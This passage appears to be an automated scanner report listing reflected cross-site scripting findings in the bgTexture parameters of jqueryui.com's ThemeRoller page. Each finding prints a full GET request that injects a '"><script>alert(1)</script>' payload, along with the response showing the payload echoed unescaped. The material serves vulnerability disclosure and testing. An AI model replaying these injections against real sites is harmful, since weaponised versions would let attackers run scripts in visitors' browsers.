light=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0b5153"><script>alert(1)</script>c40354ad18f&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0b5153"><script>alert(1)</script>c40354ad18f&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.43. http://jqueryui.com/themeroller/ [bgTextureActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b38f"><script>alert(1)</script>e88a1ca4744 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png8b38f"><script>alert(1)</script>e88a1ca4744&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png8b38f"><script>alert(1)</script>e88a1ca4744&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHig
...[SNIP]...

2.44. http://jqueryui.com/themeroller/ [bgTextureContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cea95"><script>alert(1)</script>1eeea06abb0 was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.pngcea95"><script>alert(1)</script>1eeea06abb0&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
s=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.pngcea95"><script>alert(1)</script>1eeea06abb0&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&
...[SNIP]...

2.45. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fc0e"><script>alert(1)</script>8558d7e3ed7 was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png8fc0e"><script>alert(1)</script>8558d7e3ed7&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png8fc0e"><script>alert(1)</script>8558d7e3ed7&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=
...[SNIP]...

2.46. http://jqueryui.com/themeroller/ [bgTextureError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bebe2"><script>alert(1)</script>50e8d52cb34 was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.pngbebe2"><script>alert(1)</script>50e8d52cb34&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.pngbebe2"><script>alert(1)</script>50e8d52cb34&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgText
...[SNIP]...

2.47. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b224"><script>alert(1)</script>3defc719190 was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png1b224"><script>alert(1)</script>3defc719190&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png1b224"><script>alert(1)</script>3defc719190&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffff
...[SNIP]...

2.48. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6094c"><script>alert(1)</script>a35bfbf3e53 was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png6094c"><script>alert(1)</script>a35bfbf3e53&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:09 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png6094c"><script>alert(1)</script>a35bfbf3e53&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcEr
...[SNIP]...

2.49. http://jqueryui.com/themeroller/ [bgTextureHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af8d6"><script>alert(1)</script>cb13d41972f was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.pngaf8d6"><script>alert(1)</script>cb13d41972f&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.pngaf8d6"><script>alert(1)</script>cb13d41972f&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000
...[SNIP]...

2.50. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84fc2"><script>alert(1)</script>ac4e48b54f7 was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png84fc2"><script>alert(1)</script>ac4e48b54f7&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:18 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png84fc2"><script>alert(1)</script>ac4e48b54f7&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadi
...[SNIP]...

2.51. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cad01"><script>alert(1)</script>9374f53a89e was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.pngcad01"><script>alert(1)</script>9374f53a89e&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:21 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
